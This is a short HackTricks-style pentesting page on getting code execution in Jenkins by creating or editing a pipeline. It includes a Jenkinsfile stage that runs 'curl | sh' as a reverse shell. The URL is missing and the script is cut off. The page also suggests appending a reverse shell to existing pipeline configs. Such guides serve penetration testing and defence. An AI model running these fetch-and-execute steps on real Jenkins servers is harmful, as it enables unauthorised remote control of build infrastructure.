Jenkins RCE Creating/Modifying Pipeline

Support HackTricks

Creating a new Pipeline

In "New Item" (accessible in /view/all/newJob) select Pipeline:

In the Pipeline section write the reverse shell:

pipeline {
    agent any

    stages {
        stage('Hello') {
            steps {
                sh '''
                    curl | sh

Finally click on Save, and Build Now and the pipeline will be executed:

Modifying a Pipeline

If you can access the configuration file of some pipeline configured you could just modify it appending your reverse shell and then execute it or wait until it gets executed.

Support HackTricks

Last updated